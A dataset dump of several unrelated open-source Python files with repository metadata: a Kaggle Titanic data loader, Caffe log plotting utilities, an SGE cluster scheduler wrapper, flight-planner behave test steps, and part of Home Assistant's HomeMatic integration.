] | 1 | 2022-02-09T07:35:28.000Z | 2022-02-09T07:35:28.000Z | src/atcoder/score.py | competitive-programming-helper/atcoder-api | 2e90b73349ad30a35a944e546b96af3eef75706b | [
"MIT"
] | 3 | 2022-02-02T04:39:08.000Z | 2022-02-07T23:40:14.000Z | src/atcoder/score.py | competitive-programming-helper/atcoder-api | 2e90b73349ad30a35a944e546b96af3eef75706b | [
"MIT"
] | null | null | null | import requests
def _get_my_score_page() -> requests.models.Response:
...
| 13.333333 | 53 | 0.7125 |
4a27d696a65d060ffb78249514d2eb95ca41870c | 3,087 | py | Python | .history/src/data/data_20191018141404.py | bkraft4257/kaggle_titanic | f29ea1773773109a867278c001dbd21a9f7b21dd | [
"MIT"
] | null | null | null | .history/src/data/data_20191018141404.py | bkraft4257/kaggle_titanic | f29ea1773773109a867278c001dbd21a9f7b21dd | [
"MIT"
] | null | null | null | .history/src/data/data_20191018141404.py | bkraft4257/kaggle_titanic | f29ea1773773109a867278c001dbd21a9f7b21dd | [
"MIT"
] | null | null | null | import pandas as pd
from typing import Union
from pathlib import Path
from nameparser import HumanName
class ExtractData:
title_translator = {
"Mlle.": "Mrs.",
"Mme.": "Mrs.",
"Sir.": "Mr.",
"Ms.": "Mrs.",
"": "Mr.",
"Col.": "Mr.",
"Capt.": "Mr.",
"Lady.": "Mrs.",
"the Countess. of": "Mrs.",
}
def __init__(self, filename: Union[str, Path], drop_columns=None):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.filename = filename
self.drop_columns = drop_columns
self.all_label_columns = ["survived"]
self.all_feature_columns = [
"pclass",
"name",
"sex",
"age",
"sibsp",
"parch",
"ticket",
"fare",
"cabin",
"embarked",
]
self.Xy_raw = None
self.Xy = None
self.extract_raw()
self.Xy = self.Xy_raw.copy()
self.extract_title()
self.extract_last_name()
def extract_raw(self):
"""
Extracts data from a CSV file.
Returns:
pd.DataFrame -- [description]
"""
Xy_raw = pd.read_csv(self.filename)
Xy_raw.columns = Xy_raw.columns.str.lower().str.replace(" ", "_")
Xy_raw = Xy_raw.rename(columns={'age':'age_known'})
Xy_raw["pclass"] = Xy_raw["pclass"].astype("category")
self.Xy_raw = Xy_raw.set_index("passengerid")
def extract_cabin_prefix(self):
Xy['cabin_number'] = Xy.ticket.str.extract('(\d+)$')
def extract_cabin_prefix(self):
Xy['cabin_prefix'] = Xy.ticket.str.extract('^(.+) ')
def extract_title(self):
"""[summary]
"""
self.Xy["title"] = (
self.Xy.name.apply(lambda x: HumanName(x).title)
.replace(self.title_translator)
.replace({"\.": ""}, regex=True)
)
def extract_last_name(self):
self.Xy["last_name"] = self.Xy.name.apply(lambda x: HumanName(x).last)
def clean(self,):
"""Clean data to remove missing data and "unnecessary" features.
Arguments:
in_raw_df {pd.DataFrame} -- Dataframe containing all columns and rows Kaggle Titanic Training Data set
"""
self.Xy = self.Xy_raw.drop(self.drop_columns, axis=1)
def estimate_age(in_df, groupby=['sex','title']):
Xy_age_estimate = in_df.groupby(['sex','title']).age_known.mean().to_frame().round(1)
Xy_age_estimate = Xy_age_estimate.rename(columns ={'age_known':'age_estimate'})
out_df = in_df.reset_index().merge(Xy_age_estimate, on=['sex', 'title'])
out_df['age'] = out_df['age_known'].fillna(out_df['age_estimate'])
return out_df | 29.4 | 114 | 0.550049 |
4a27d7a86c2f4dd8f0a2fecadb9faf60c9922361 | 2,172 | py | Python | util/caffe_.py | saicoco/SA-Text | 353a73d84246a54962f3b7ffb7c7ca2e35f235e8 | [
"MIT"
] | 47 | 2020-02-21T23:36:28.000Z | 2021-12-21T01:34:38.000Z | util/caffe_.py | sapjunior/SA-Text | 353a73d84246a54962f3b7ffb7c7ca2e35f235e8 | [
"MIT"
] | 4 | 2020-04-03T04:59:54.000Z | 2021-11-04T08:14:52.000Z | util/caffe_.py | sapjunior/SA-Text | 353a73d84246a54962f3b7ffb7c7ca2e35f235e8 | [
"MIT"
] | 18 | 2020-02-21T10:06:34.000Z | 2021-09-15T01:50:55.000Z | # encoding=utf-8
import util
def get_data(net, name):
import caffe
if isinstance(net, caffe._caffe.Solver):
net = net.net
return net.blobs[name].data[...]
def get_params(net, name = None):
import caffe
if isinstance(net, caffe._caffe.Solver):
net = net.net
params = net.params[name]
p = []
for param in params:
p.append(param.data[...])
return p
def draw_log(log_path, output_names, show = False, save_path = None, from_to = None, smooth = False):
pattern = "Train net output: word_bbox_loc_loss = "
log_path = util.io.get_absolute_path(log_path)
f = open(log_path,'r')
iterations = []
outputs = {}
plt = util.plt.plt
for line in f.readlines():
if util.str.contains(line, 'Iteration') and util.str.contains(line, 'loss = '):
s = line.split('Iteration')[-1]
iter_num = util.str.find_all(s, '\d+')[0]
iter_num = int(iter_num)
iterations.append(iter_num)
if util.str.contains(line, "Train net output #"):
s = util.str.split(line, 'Train net output #\d+\:')[-1]
s = s.split('(')[0]
output = util.str.find_all(s, '\d*\.*\d+e*\-*\d*\.*\d*')[-1]
output = eval(output)
output = float(output)
for name in output_names:
ptr = ' '+ name + ' ='
if util.str.contains(line, ptr):
if name not in outputs:
outputs[name] = []
outputs[name].append(output)
if len(outputs)==0:
return
for name in outputs:
output = outputs[name]
if smooth:
output = util.np.smooth(output)
start = 0
end = len(output)
if from_to is not None:
start = from_to[0]
end = from_to[1]
line_style = util.plt.get_random_line_style()
plt.plot(iterations[start: end], output[start: end], line_style, label = name)
plt.legend()
if save_path is not None:
util.plt.save_image(save_path)
if show:
util.plt.show()
| 31.941176 | 101 | 0.535451 |
4a27d7cf6b516c363a43116f3c53224c9d786ca0 | 15,928 | py | Python | mycluster/schedulers/sge.py | zenotech/MyCluster | 0399e2bb95c31efd8f99c6f0f3941d0c1f7d42c4 | [
"BSD-3-Clause"
] | 7 | 2017-05-04T13:38:16.000Z | 2020-09-28T02:44:01.000Z | mycluster/schedulers/sge.py | zenotech/MyCluster | 0399e2bb95c31efd8f99c6f0f3941d0c1f7d42c4 | [
"BSD-3-Clause"
] | 27 | 2015-01-05T13:39:22.000Z | 2020-01-16T11:56:56.000Z | mycluster/schedulers/sge.py | zenotech/MyCluster | 0399e2bb95c31efd8f99c6f0f3941d0c1f7d42c4 | [
"BSD-3-Clause"
] | 4 | 2017-05-21T17:01:18.000Z | 2019-12-11T15:31:18.000Z | # BSD 3 - Clause License
# Copyright(c) 2021, Zenotech
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and / or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES
# LOSS OF USE, DATA, OR PROFITS
# OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import math
import subprocess
import datetime
from .base import Scheduler
from mycluster.exceptions import SchedulerException, ConfigurationException
class SGE(Scheduler):
def scheduler_type(self):
return "sge"
def name(self):
return os.getenv("SGE_CLUSTER_NAME")
def queues(self):
# list all parallel env
# for parallel_env list queues associated
# Find first node with queue and record node config
queue_list = []
parallel_env_list = []
with os.popen("qconf -spl") as f:
for line in f:
parallel_env_list.append(line.strip())
for parallel_env in parallel_env_list:
with os.popen("qstat -pe " + parallel_env + " -U `whoami` -g c") as f:
f.readline() # read header
f.readline() # read separator
for line in f:
queue_name = line.split(" ")[0].strip()
# Check if user has permission to use queue
with os.popen("qstat -g c -U `whoami` -q " + queue_name) as f2:
try:
f2.readline()
f2.readline()
if len(f2.readline()):
queue_list.append(parallel_env + ":" + queue_name)
except:
pass
return queue_list
def node_config(self, queue_id):
# Find first node with queue and record node config
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
host_group = 0
with os.popen("qconf -sq " + queue_name) as f:
for line in f:
if line.split(" ")[0] == "hostlist":
new_line = re.sub(" +", " ", line)
host_group = new_line.split(" ")[1]
config = {}
host_name = ""
found = False
if host_group[0] is "@":
# Is a host group
with os.popen("qconf -shgrp_resolved " + host_group) as f:
for line in f:
for host_name in line.split(" "):
with os.popen("qhost -q -h " + host_name) as f:
header = f.readline() # read header
f.readline() # read separator
new_header = re.sub(" +", " ", header).strip()
# sge <=6.2u4 style
if (new_header.split(" ")[3]) == "LOAD":
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(
new_line.split(" ")[2]
)
config["max thread"] = int(
new_line.split(" ")[2]
)
config["max memory"] = new_line.split(
" "
)[4]
found = True
break
else:
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(
new_line.split(" ")[4]
)
config["max thread"] = int(
new_line.split(" ")[5]
)
config["max memory"] = new_line.split(
" "
)[7]
found = True
break
if found:
break
else:
# Is a host
host_name = host_group
with os.popen("qhost -q -h " + host_name) as f:
header = f.readline() # read header
f.readline() # read separator
new_header = re.sub(" +", " ", header).strip()
if (new_header.split(" ")[3]) == "LOAD": # sge <=6.2u4 style
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(new_line.split(" ")[2])
config["max thread"] = int(new_line.split(" ")[2])
config["max memory"] = new_line.split(" ")[4]
else:
config["max task"] = 0
config["max thread"] = 0
config["max memory"] = 0
else:
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(new_line.split(" ")[4])
config["max thread"] = int(new_line.split(" ")[5])
config["max memory"] = new_line.split(" ")[7]
else:
config["max task"] = 0
config["max thread"] = 0
config["max memory"] = 0
return config
def tasks_per_node(self, queue_id):
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
tasks = 0
with os.popen("qconf -sq " + queue_name) as f:
for line in f:
if line.split(" ")[0] == "slots":
tasks = int(re.split("\W+", line)[1])
pe_tasks = tasks
with os.popen("qconf -sp " + parallel_env) as f:
try:
for line in f:
if line.split(" ")[0] == "allocation_rule":
try:
# This may throw exception as allocation rule
# may not always be an integer
pe_tasks = int(re.split("\W+", line)[1])
except ValueError as e:
raise SchedulerException("Error parsing SGE output")
except:
pass
return min(tasks, pe_tasks)
def available_tasks(self, queue_id):
# split queue id into queue and parallel env
# list free slots
free_tasks = 0
max_tasks = 0
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
with os.popen(" qstat -pe " + parallel_env + " -U `whoami` -g c") as f:
f.readline() # read header
f.readline() # read separator
for line in f:
# remove multiple white space
new_line = re.sub(" +", " ", line)
qn = new_line.split(" ")[0]
if qn == queue_name:
free_tasks = int(new_line.split(" ")[4])
max_tasks = int(new_line.split(" ")[5])
return {"available": free_tasks, "max tasks": max_tasks}
def _min_tasks_per_node(self, queue_id):
"""
This function is used when requesting non exclusive use
as the parallel environment might enforce a minimum number
of tasks
"""
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
tasks = 1
pe_tasks = tasks
with os.popen("qconf -sp " + parallel_env) as f:
try:
for line in f:
if line.split(" ")[0] == "allocation_rule":
# This may throw exception as allocation rule
# may not always be an integer
pe_tasks = int(re.split("\W+", line)[1])
except:
pass
return max(tasks, pe_tasks)
def create_submit(
self,
queue_id,
num_tasks,
job_name,
job_script,
wall_clock,
openmpi_args="-bysocket -bind-to-socket",
project_name="default",
tasks_per_node=None,
threads_per_task=1,
user_email=None,
qos=None,
exclusive=True,
output_name=None,
):
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
if tasks_per_node is None:
tasks_per_node = self.tasks_per_node(queue_id)
num_nodes = int(math.ceil(float(num_tasks) / float(tasks_per_node)))
if threads_per_task is None:
threads_per_task = 1
if ":" not in wall_clock:
wall_clock = wall_clock + ":00:00"
if "mycluster-" in job_script:
job_script = self._get_data(job_script)
if output_name is None:
output_name = job_name + ".out"
# For exclusive node use total number of slots required
# is number of nodes x number of slots offer by queue
num_queue_slots = num_nodes * self.tasks_per_node(queue_id)
if not exclusive:
if num_nodes == 1: # Assumes fill up rule
num_queue_slots = max(
tasks_per_node, self._min_tasks_per_node(queue_id)
)
template = self._load_template("sge.jinja")
script_str = template.render(
my_name=job_name,
my_script=job_script,
my_output=output_name,
user_email=user_email,
queue_name=queue_name,
parallel_env=parallel_env,
num_queue_slots=num_queue_slots,
num_tasks=num_tasks,
tpn=tasks_per_node,
num_threads_per_task=threads_per_task,
num_nodes=num_nodes,
project_name=project_name,
wall_clock=wall_clock,
openmpi_args=openmpi_args,
qos=qos,
exclusive=exclusive,
)
return script_str
def submit(
self, script_name, immediate=False, depends_on=None, depends_on_always_run=False
):
job_id = None
output = subprocess.run(
f"qsub -V -terse {script_name}",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
if output.returncode == 0:
job_id = 0
out = output.stdout.decode("utf-8")
try:
job_id = int(out.readline().strip())
return job_id
except:
raise SchedulerException("Error submitting job to SGE")
else:
raise SchedulerException(
f"Error submitting job to SGE: {output.stderr.decode('utf-8')}"
)
def list_current_jobs(self):
jobs = []
output = subprocess.run(
"qstat -u `whoami`",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
if output.returncode == 0:
for line in output.stdout.decode("utf-8").splitlines():
if line.startswith("job-ID") or line.startswith("---"):
continue
job_info = re.sub(" +", " ", line.strip()).split(" ")
jobs.append(
{
"id": int(job_info[0]),
"queue": job_info[6],
"name": job_info[2],
"state": job_info[4],
}
)
else:
raise SchedulerException("Error fetching job queue listing")
return jobs
def get_job_details(self, job_id):
"""
Get full job and step stats for job_id
First check using sacct, then fallback to squeue
"""
stats_dict = {}
output = {}
with os.popen("qacct -j " + str(job_id)) as f:
try:
f.readline() # read header
for line in f:
new_line = re.sub(" +", " ", line.strip())
output[new_line.split(" ")[0]] = new_line.split(" ", 1)[1]
except:
pass
stats_dict["wallclock"] = datetime.timedelta(
seconds=int(output["ru_wallclock"])
)
stats_dict["mem"] = output["mem"]
stats_dict["cpu"] = datetime.timedelta(seconds=int(output["cpu"].split(".")[0]))
stats_dict["queue"] = output["granted_pe"] + ":" + output["qname"]
return stats_dict
def delete(self, job_id):
cmd = f"qdel {job_id}"
output = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
if output.returncode != 0:
raise SchedulerException(f"Error cancelling job {job_id}")
| 40.841026 | 88 | 0.458312 |
4a27d873156de2cbb7a548f4f35e07f26d2703de | 2,001 | py | Python | Features/steps/add_flight.py | tbielski/flights-planner | ad2f7a6ef4ef80b71a1d71d1655c4101131b54a6 | [
"MIT"
] | null | null | null | Features/steps/add_flight.py | tbielski/flights-planner | ad2f7a6ef4ef80b71a1d71d1655c4101131b54a6 | [
"MIT"
] | null | null | null | Features/steps/add_flight.py | tbielski/flights-planner | ad2f7a6ef4ef80b71a1d71d1655c4101131b54a6 | [
"MIT"
] | null | null | null | from behave import *
from datetime import datetime
from flights_planner.FlightRepository import FlightRepository
from flights_planner.EconomyFlight import EconomyFlight
from flights_planner.BusinessFlight import BusinessFlight
from flights_planner.PremiumFlight import PremiumFlight
use_step_matcher("re")
@given("there is a flights_repository")
def step_impl(context):
context.repository = FlightRepository([])
@given("there is a business flight")
def step_impl(context):
context.business_flight = BusinessFlight("0", "Gdańsk", "Warszawa", datetime(2019, 12, 12, 22, 00))
@when("we add a business flight")
def step_impl(context):
context.repository.add_flight(context.business_flight)
@then("flights_repository1 should have one flight")
def step_impl(context):
assert context.business_flight.flight_id == "0"
assert len(context.repository.data_source) == 1
assert context.repository.data_source[0].flight_id == "0"
@given("there is a economy flight")
def step_impl(context):
context.economy_flight = EconomyFlight("0", "Gdańsk", "Warszawa", datetime(2019, 12, 12, 22, 00))
@when("we add an economy flight")
def step_impl(context):
context.repository.add_flight(context.economy_flight)
@then("flights_repository2 should have one flight")
def step_impl(context):
assert context.economy_flight.flight_id == "0"
assert len(context.repository.data_source) == 1
assert context.repository.data_source[0].flight_id == "0"
@given("there is a premium flight")
def step_impl(context):
context.premium_flight = PremiumFlight("0", "Gdańsk", "Warszawa", datetime(2019, 12, 12, 22, 00))
@when("we add a premium flight")
def step_impl(context):
context.repository.add_flight(context.premium_flight)
@then("flights_repository3 should have one flight")
def step_impl(context):
assert context.premium_flight.flight_id == "0"
assert len(context.repository.data_source) == 1
assert context.repository.data_source[0].flight_id == "0"
| 29.426471 | 103 | 0.758121 |
4a27d918d95292fa7160c40d342a0faa671f33a4 | 31,008 | py | Python | homeassistant/components/homematic/__init__.py | Tony763/home-assistant | fa1df2e015d76abfc6cfd7d795eb439130f5d0ea | [
"Apache-2.0"
] | null | null | null | homeassistant/components/homematic/__init__.py | Tony763/home-assistant | fa1df2e015d76abfc6cfd7d795eb439130f5d0ea | [
"Apache-2.0"
] | 3 | 2021-09-08T03:29:36.000Z | 2022-03-12T00:59:48.000Z | homeassistant/components/homematic/__init__.py | akhan69/home-assistant | fb460a325e25fdea9043136bccaf546ec1c04eab | [
"Apache-2.0"
] | null | null | null | """Support for HomeMatic devices."""
from datetime import timedelta
from functools import partial
import logging
import socket
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_NAME, CONF_HOST, CONF_HOSTS, CONF_PASSWORD,
CONF_PLATFORM, CONF_SSL, CONF_USERNAME, CONF_VERIFY_SSL,
EVENT_HOMEASSISTANT_STOP, STATE_UNKNOWN)
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
REQUIREMENTS = ['pyhomematic==0.1.56']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'homematic'
SCAN_INTERVAL_HUB = timedelta(seconds=300)
SCAN_INTERVAL_VARIABLES = timedelta(seconds=30)
DISCOVER_SWITCHES = 'homematic.switch'
DISCOVER_LIGHTS = 'homematic.light'
DISCOVER_SENSORS = 'homematic.sensor'
DISCOVER_BINARY_SENSORS = 'homematic.binary_sensor'
DISCOVER_COVER = 'homematic.cover'
DISCOVER_CLIMATE = 'homematic.climate'
DISCOVER_LOCKS = 'homematic.locks'
ATTR_DISCOVER_DEVICES = 'devices'
ATTR_PARAM = 'param'
ATTR_CHANNEL = 'channel'
ATTR_ADDRESS = 'address'
ATTR_VALUE = 'value'
ATTR_INTERFACE = 'interface'
ATTR_ERRORCODE = 'error'
ATTR_MESSAGE = 'message'
ATTR_MODE = 'mode'
ATTR_TIME = 'time'
ATTR_UNIQUE_ID = 'unique_id'
ATTR_PARAMSET_KEY = 'paramset_key'
ATTR_PARAMSET = 'paramset'
EVENT_KEYPRESS = 'homematic.keypress'
EVENT_IMPULSE = 'homematic.impulse'
EVENT_ERROR = 'homematic.error'
SERVICE_VIRTUALKEY = 'virtualkey'
SERVICE_RECONNECT = 'reconnect'
SERVICE_SET_VARIABLE_VALUE = 'set_variable_value'
SERVICE_SET_DEVICE_VALUE = 'set_device_value'
SERVICE_SET_INSTALL_MODE = 'set_install_mode'
SERVICE_PUT_PARAMSET = 'put_paramset'
HM_DEVICE_TYPES = {
DISCOVER_SWITCHES: [
'Switch', 'SwitchPowermeter', 'IOSwitch', 'IPSwitch', 'RFSiren',
'IPSwitchPowermeter', 'HMWIOSwitch', 'Rain', 'EcoLogic',
'IPKeySwitchPowermeter', 'IPGarage', 'IPKeySwitch', 'IPMultiIO'],
DISCOVER_LIGHTS: ['Dimmer', 'KeyDimmer', 'IPKeyDimmer', 'IPDimmer',
'ColorEffectLight'],
DISCOVER_SENSORS: [
'SwitchPowermeter', 'Motion', 'MotionV2', 'RemoteMotion', 'MotionIP',
'ThermostatWall', 'AreaThermostat', 'RotaryHandleSensor',
'WaterSensor', 'PowermeterGas', 'LuxSensor', 'WeatherSensor',
'WeatherStation', 'ThermostatWall2', 'TemperatureDiffSensor',
'TemperatureSensor', 'CO2Sensor', 'IPSwitchPowermeter', 'HMWIOSwitch',
'FillingLevel', 'ValveDrive', 'EcoLogic', 'IPThermostatWall',
'IPSmoke', 'RFSiren', 'PresenceIP', 'IPAreaThermostat',
'IPWeatherSensor', 'RotaryHandleSensorIP', 'IPPassageSensor',
'IPKeySwitchPowermeter', 'IPThermostatWall230V', 'IPWeatherSensorPlus',
'IPWeatherSensorBasic', 'IPBrightnessSensor', 'IPGarage',
'UniversalSensor', 'MotionIPV2', 'IPMultiIO'],
DISCOVER_CLIMATE: [
'Thermostat', 'ThermostatWall', 'MAXThermostat', 'ThermostatWall2',
'MAXWallThermostat', 'IPThermostat', 'IPThermostatWall',
'ThermostatGroup', 'IPThermostatWall230V'],
DISCOVER_BINARY_SENSORS: [
'ShutterContact', 'Smoke', 'SmokeV2', 'Motion', 'MotionV2',
'MotionIP', 'RemoteMotion', 'WeatherSensor', 'TiltSensor',
'IPShutterContact', 'HMWIOSwitch', 'MaxShutterContact', 'Rain',
'WiredSensor', 'PresenceIP', 'IPWeatherSensor', 'IPPassageSensor',
'SmartwareMotion', 'IPWeatherSensorPlus', 'MotionIPV2', 'WaterIP',
'IPMultiIO', 'TiltIP'],
DISCOVER_COVER: ['Blind', 'KeyBlind', 'IPKeyBlind', 'IPKeyBlindTilt'],
DISCOVER_LOCKS: ['KeyMatic']
}
HM_IGNORE_DISCOVERY_NODE = [
'ACTUAL_TEMPERATURE',
'ACTUAL_HUMIDITY'
]
HM_IGNORE_DISCOVERY_NODE_EXCEPTIONS = {
'ACTUAL_TEMPERATURE': [
'IPAreaThermostat', 'IPWeatherSensor',
'IPWeatherSensorPlus', 'IPWeatherSensorBasic'],
}
HM_ATTRIBUTE_SUPPORT = {
'LOWBAT': ['battery', {0: 'High', 1: 'Low'}],
'LOW_BAT': ['battery', {0: 'High', 1: 'Low'}],
'ERROR': ['sabotage', {0: 'No', 1: 'Yes'}],
'ERROR_SABOTAGE': ['sabotage', {0: 'No', 1: 'Yes'}],
'SABOTAGE': ['sabotage', {0: 'No', 1: 'Yes'}],
'RSSI_PEER': ['rssi_peer', {}],
'RSSI_DEVICE': ['rssi_device', {}],
'VALVE_STATE': ['valve', {}],
'LEVEL': ['level', {}],
'BATTERY_STATE': ['battery', {}],
'CONTROL_MODE': ['mode', {
0: 'Auto',
1: 'Manual',
2: 'Away',
3: 'Boost',
4: 'Comfort',
5: 'Lowering'
}],
'POWER': ['power', {}],
'CURRENT': ['current', {}],
'VOLTAGE': ['voltage', {}],
'OPERATING_VOLTAGE': ['voltage', {}],
'WORKING': ['working', {0: 'No', 1: 'Yes'}]
}
HM_PRESS_EVENTS = [
'PRESS_SHORT',
'PRESS_LONG',
'PRESS_CONT',
'PRESS_LONG_RELEASE',
'PRESS',
]
HM_IMPULSE_EVENTS = [
'SEQUENCE_OK',
]
CONF_RESOLVENAMES_OPTIONS = [
'metadata',
'json',
'xml',
False
]
DATA_HOMEMATIC = 'homematic'
DATA_STORE = 'homematic_store'
DATA_CONF = 'homematic_conf'
CONF_INTERFACES = 'interfaces'
CONF_LOCAL_IP = 'local_ip'
CONF_LOCAL_PORT = 'local_port'
CONF_PORT = 'port'
CONF_PATH = 'path'
CONF_CALLBACK_IP = 'callback_ip'
CONF_CALLBACK_PORT = 'callback_port'
CONF_RESOLVENAMES = 'resolvenames'
CONF_JSONPORT = 'jsonport'
CONF_VARIABLES = 'variables'
CONF_DEVICES = 'devices'
CONF_PRIMARY = 'primary'
DEFAULT_LOCAL_IP = '0.0.0.0'
DEFAULT_LOCAL_PORT = 0
DEFAULT_RESOLVENAMES = False
DEFAULT_JSONPORT = 80
DEFAULT_PORT = 2001
DEFAULT_PATH = ''
DEFAULT_USERNAME = 'Admin'
DEFAULT_PASSWORD = ''
DEFAULT_SSL = False
DEFAULT_VERIFY_SSL = False
DEFAULT_CHANNEL = 1
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): 'homematic',
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_ADDRESS): cv.string,
vol.Required(ATTR_INTERFACE): cv.string,
vol.Optional(ATTR_CHANNEL, default=DEFAULT_CHANNEL): vol.Coerce(int),
vol.Optional(ATTR_PARAM): cv.string,
vol.Optional(ATTR_UNIQUE_ID): cv.string,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_INTERFACES, default={}): {cv.match_all: {
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PATH, default=DEFAULT_PATH): cv.string,
vol.Optional(CONF_RESOLVENAMES, default=DEFAULT_RESOLVENAMES):
vol.In(CONF_RESOLVENAMES_OPTIONS),
vol.Optional(CONF_JSONPORT, default=DEFAULT_JSONPORT): cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_CALLBACK_IP): cv.string,
vol.Optional(CONF_CALLBACK_PORT): cv.port,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
vol.Optional(
CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
}},
vol.Optional(CONF_HOSTS, default={}): {cv.match_all: {
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
}},
vol.Optional(CONF_LOCAL_IP, default=DEFAULT_LOCAL_IP): cv.string,
vol.Optional(CONF_LOCAL_PORT): cv.port,
}),
}, extra=vol.ALLOW_EXTRA)
SCHEMA_SERVICE_VIRTUALKEY = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): cv.string,
vol.Optional(ATTR_INTERFACE): cv.string,
})
SCHEMA_SERVICE_SET_VARIABLE_VALUE = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
})
SCHEMA_SERVICE_SET_DEVICE_VALUE = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_INTERFACE): cv.string,
})
SCHEMA_SERVICE_RECONNECT = vol.Schema({})
SCHEMA_SERVICE_SET_INSTALL_MODE = vol.Schema({
vol.Required(ATTR_INTERFACE): cv.string,
vol.Optional(ATTR_TIME, default=60): cv.positive_int,
vol.Optional(ATTR_MODE, default=1):
vol.All(vol.Coerce(int), vol.In([1, 2])),
vol.Optional(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
})
SCHEMA_SERVICE_PUT_PARAMSET = vol.Schema({
vol.Required(ATTR_INTERFACE): cv.string,
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_PARAMSET_KEY): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_PARAMSET): dict,
})
def setup(hass, config):
"""Set up the Homematic component."""
from pyhomematic import HMConnection
conf = config[DOMAIN]
hass.data[DATA_CONF] = remotes = {}
hass.data[DATA_STORE] = set()
# Create hosts-dictionary for pyhomematic
for rname, rconfig in conf[CONF_INTERFACES].items():
remotes[rname] = {
'ip': socket.gethostbyname(rconfig.get(CONF_HOST)),
'port': rconfig.get(CONF_PORT),
'path': rconfig.get(CONF_PATH),
'resolvenames': rconfig.get(CONF_RESOLVENAMES),
'jsonport': rconfig.get(CONF_JSONPORT),
'username': rconfig.get(CONF_USERNAME),
'password': rconfig.get(CONF_PASSWORD),
'callbackip': rconfig.get(CONF_CALLBACK_IP),
'callbackport': rconfig.get(CONF_CALLBACK_PORT),
'ssl': rconfig.get(CONF_SSL),
'verify_ssl': rconfig.get(CONF_VERIFY_SSL),
'connect': True,
}
for sname, sconfig in conf[CONF_HOSTS].items():
remotes[sname] = {
'ip': socket.gethostbyname(sconfig.get(CONF_HOST)),
'port': DEFAULT_PORT,
'username': sconfig.get(CONF_USERNAME),
'password': sconfig.get(CONF_PASSWORD),
'connect': False,
}
# Create server thread
bound_system_callback = partial(_system_callback_handler, hass, config)
